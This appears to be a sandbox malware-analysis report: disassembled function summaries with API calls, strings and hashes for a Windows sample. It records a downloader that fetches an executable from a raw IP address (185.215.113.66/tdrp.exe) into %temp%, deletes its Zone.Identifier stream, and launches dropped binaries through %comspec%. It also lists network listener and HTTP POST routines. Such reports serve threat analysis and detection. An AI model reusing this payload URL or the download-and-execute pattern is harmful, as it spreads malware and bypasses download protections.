%comspec%, xrefs: 004066EE
/c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: wsprintf$CreateInitializeInstance
String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
API String ID: 1147330536-497122036
Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54

Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
htons.WS2_32(?), ref: 00401508
setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
bind.WS2_32(?,?,00000010), ref: 0040153B

Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
String ID:
API String ID: 4174406920-0
Opcode ID: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
Opcode Fuzzy Hash: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A

Function 0040D770 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040D782
ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
GetTickCount.KERNEL32 ref: 0040D7F4
Sleep.KERNEL32(00000001), ref: 0040D814
GetTickCount.KERNEL32 ref: 0040D81A

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: CountTick$Sleepioctlsocketrecv
String ID:
API String ID: 107502007-0
Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99

Function 0040B430 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00000050), ref: 0040B45D

Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D

socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
connect.WS2_32(000000FF,?,00000010), ref: 0040B496
getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8

Strings

www.update.microsoft.com, xrefs: 0040B467

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
String ID: www.update.microsoft.com
API String ID: 4063137541-1705189816
Opcode ID: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
Opcode Fuzzy Hash: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA

Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
bind.WS2_32(?,?,00000010), ref: 00401429

Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401459

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
String ID:
API String ID: 3943618503-0
Opcode ID: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
Opcode Fuzzy Hash: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A

Function 0040C830 Relevance: 4.5, APIs: 3, Instructions: 26encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(004083EF,00000000,00000000,00000001,F0000040,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C843
CryptGenRandom.ADVAPI32(004083EF,?,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C859
CryptReleaseContext.ADVAPI32(004083EF,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C865

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
Instruction ID: f90ee11572ba5f49e3e1a660dc1e1657e7f5db47d76125bfba77a944767198f2
Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
Instruction Fuzzy Hash: 69E012B5650208FBDB14DFD1EC49FDA776CAB48B01F108554F709E7180DAB5EA4097A8

Function 0040DF20 Relevance: 3.0, APIs: 2, Instructions: 15timenativeCOMMON

Download Yara Rule

APIs

NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Time$QuerySecondsSince1980System
String ID:
API String ID: 1987401769-0
Opcode ID: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
Instruction ID: 284f4c0ca90a751934941b1d9bfeddc82ee070f17a0c71d7a2ad06256d95dcf5
Opcode Fuzzy Hash: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
Instruction Fuzzy Hash: 71D0C779D4010DBBCB00DBE4E84DCDDB77CEB44201F0086D6ED1593150EAB06658CBD5

Function 0040FB45 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0040FBF6

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 801e3abdb9ed3473d766d6bc3744bf4a8f04e52caf0f4b1d7f90672c87cc4716
Instruction ID: 340d7b290d5355f760e33cf283827fd55aa9a8eadb82a746881808a00d0f8de8
Opcode Fuzzy Hash: 801e3abdb9ed3473d766d6bc3744bf4a8f04e52caf0f4b1d7f90672c87cc4716
Instruction Fuzzy Hash: CD61D6316046098FDB39CB29D49166A73A5FF85754F25813BDC06E7AD0E338EC4ACA4C

Function 0040A890 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A8AC

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: HeapsProcess
String ID:
API String ID: 1420622215-0
Opcode ID: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
Instruction ID: 4a2b5bc9ffc7c309cb72e1a35e8a8f61e1833fedd8d517872c2a42ed84d10103
Opcode Fuzzy Hash: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
Instruction Fuzzy Hash: DD01DAF0904218CADB209B14D9887ADB774AB84304F1185EAD74977281C3781EDADF5E

Function 0040F560 Relevance: 73.7, APIs: 36, Strings: 6, Instructions: 231
filesleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040F569
srand.MSVCRT ref: 0040F570
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
strlen.NTDLL ref: 0040F59A
mbstowcs.NTDLL ref: 0040F5B1
rand.MSVCRT ref: 0040F5B9
rand.MSVCRT ref: 0040F5CD
wsprintfW.USER32 ref: 0040F5F4
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
wsprintfW.USER32 ref: 0040F6F4
DeleteFileW.KERNEL32(?), ref: 0040F704
Sleep.KERNEL32(000003E8), ref: 0040F70F
Sleep.KERNEL32(000007D0), ref: 0040F730
ExitProcess.KERNEL32 ref: 0040F758
DeleteFileW.KERNEL32(?), ref: 0040F76E
CloseHandle.KERNEL32(000000FF), ref: 0040F77B
InternetCloseHandle.WININET(00000000), ref: 0040F788
InternetCloseHandle.WININET(00000000), ref: 0040F795
Sleep.KERNEL32(000003E8), ref: 0040F7A0
rand.MSVCRT ref: 0040F7B5
Sleep.KERNEL32 ref: 0040F7C6
rand.MSVCRT ref: 0040F7CC
rand.MSVCRT ref: 0040F7E0
wsprintfW.USER32 ref: 0040F807
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
wsprintfW.USER32 ref: 0040F844
DeleteFileW.KERNEL32(?), ref: 0040F854
Sleep.KERNEL32(000003E8), ref: 0040F85F
Sleep.KERNEL32(000007D0), ref: 0040F880
ExitProcess.KERNEL32 ref: 0040F8A7
DeleteFileW.KERNEL32(?), ref: 0040F8B6

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F605
%temp%, xrefs: 0040F58B
%s\%d%d.exe, xrefs: 0040F5E8
%s\%d%d.exe, xrefs: 0040F7FB
%s:Zone.Identifier, xrefs: 0040F838
%s:Zone.Identifier, xrefs: 0040F6E8

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
API String ID: 1632876846-2803014298
Opcode ID: 1320f0edb417db05ac7b6e59eda74473c88091b903de4ca17509dc3647de578b
Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
Opcode Fuzzy Hash: 1320f0edb417db05ac7b6e59eda74473c88091b903de4ca17509dc3647de578b
Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69

Function 004064A0 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 111
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004064A9
srand.MSVCRT ref: 004064B0
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
rand.MSVCRT ref: 004064D6
rand.MSVCRT ref: 004064EA
wsprintfW.USER32 ref: 0040650F
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
CloseHandle.KERNEL32(000000FF), ref: 004065F2
wsprintfW.USER32 ref: 00406609
DeleteFileW.KERNEL32(?), ref: 00406619
CloseHandle.KERNEL32(000000FF), ref: 0040662D
InternetCloseHandle.WININET(00000000), ref: 0040663A
InternetCloseHandle.WININET(00000000), ref: 00406647

Strings

%temp%, xrefs: 004064CB
%s:Zone.Identifier, xrefs: 004065FD
http://185.215.113.66/tdrp.exe, xrefs: 00406546
%s\%d%d.exe, xrefs: 00406505
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe
API String ID: 2816847299-853099633
Opcode ID: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
Opcode Fuzzy Hash: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28

Function 0040B850 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE

strcmp.NTDLL ref: 0040B880

Strings

.192, xrefs: 0040B90E
127., xrefs: 0040B891
10., xrefs: 0040B94F
0.0.0.0, xrefs: 0040B86E
.10., xrefs: 0040B98B
.127, xrefs: 0040B8AF
192., xrefs: 0040B8F0
.192., xrefs: 0040B92C
.10, xrefs: 0040B96D
.127., xrefs: 0040B8CD

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: gethostbynamegethostnamestrcmp
String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
API String ID: 2906596889-2213908610
Opcode ID: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
Opcode Fuzzy Hash: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE

Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138
networksynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040192C
WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
accept.WS2_32(?,?,?), ref: 004019A8
GetTickCount.KERNEL32 ref: 004019F6
EnterCriticalSection.KERNEL32(?), ref: 00401A09
LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
GetTickCount.KERNEL32 ref: 00401A43
EnterCriticalSection.KERNEL32(?), ref: 00401A52
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
GetTickCount.KERNEL32 ref: 00401AAB
WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB

Strings

PCOI, xrefs: 0040198A
ilci, xrefs: 004019E1

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
String ID: PCOI$ilci
API String ID: 3345448188-3762367603
Opcode ID: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
Opcode Fuzzy Hash: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99

Function 0040EF70 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040EF98
InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
InternetCloseHandle.WININET(00000000), ref: 0040F181
InternetCloseHandle.WININET(00000000), ref: 0040F18E
InternetCloseHandle.WININET(00000000), ref: 0040F19B

Strings

POST, xrefs: 0040F05E
<, xrefs: 0040EFA0
Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x), xrefs: 0040EFF6

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
API String ID: 2761394606-2217117414
Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54

Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
InterlockedDecrement.KERNEL32(?), ref: 0040164B
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
InterlockedIncrement.KERNEL32(?), ref: 00401691
InterlockedDecrement.KERNEL32(?), ref: 004016A1
LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
WSACloseEvent.WS2_32(?), ref: 00401715
DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B

Strings

PCOI, xrefs: 0040160D
ilci, xrefs: 00401630

Memory Dump Source

Source File: 00000005.00000002.1484336637.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1484320915.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1484370497.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_1706633239.jbxd

Yara matches

Similarity

API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
String ID: PCOI$ilci
API String ID: 2403999931-3762367603
Opcode ID: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
Opcode Fuzzy Hash: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
